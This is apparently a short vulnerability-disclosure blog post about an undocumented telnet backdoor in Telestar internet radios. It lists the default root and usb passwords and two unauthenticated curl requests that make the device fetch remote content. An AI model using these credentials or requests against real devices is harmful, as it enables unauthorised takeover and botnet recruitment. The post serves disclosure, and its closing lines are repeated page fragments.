An undocumented telnet backdoor was found in a popular radio player

Summary:

The German technology company Telestar-Digital is a
popular producer of Internet radios. A backdoor was found and exploited in the devices by using
the open source tools nmap and ncrack.

The vulnerability has been given the CVE’s of CVE-2019-13473 and CVE-2019-13474.

Proof of concept

The default username’s and password’s where:

root / password
usb / winbond

The system runs an embedded linux kernel which is very common among IoT devices.

OS: CC: (GNU) 3.3.2 20031005 (Debian prerelease)GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC:
(GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 3.3.2 20031005 (Debian prerelease)Aaeabi.shstrtab.init.text.fini.
rodata.ARM.extab.ARM.exidx.eh_frame.init_array.
fini_array.jcr.data.rel.ro.got.data.bss.comment.ARM.attributes

Several actions can be performed without authentication:

Change the logo:

curl -XGET http://iphere/mylogo?url=http://example.com/own.jpg

Download a file:

curl -XGET http://iphere/LocalPlay?url=http://example.com/msg.wav&save=1

This vulnerability and backdoor is most likely to be used in bigger automated
attacks such as the Mirai botnet.

External links:
Telestar.de
Vulnerability labs article
Mirai botnet cloudflare
Mirai botnet wikipedia

Stay up to date with Vulnerability Management and build cool things with our API

This blog post is part of the exploit of the day series
where we write a shorter description about interesting
exploits that we index.

Imperial & Dabman Internet Radio Backdoor

An undocumented telnet backdoor was found in a popular radio player

Summary:

Proof of concept

Several actions can be performed without authentication:

Firo Solutions Blog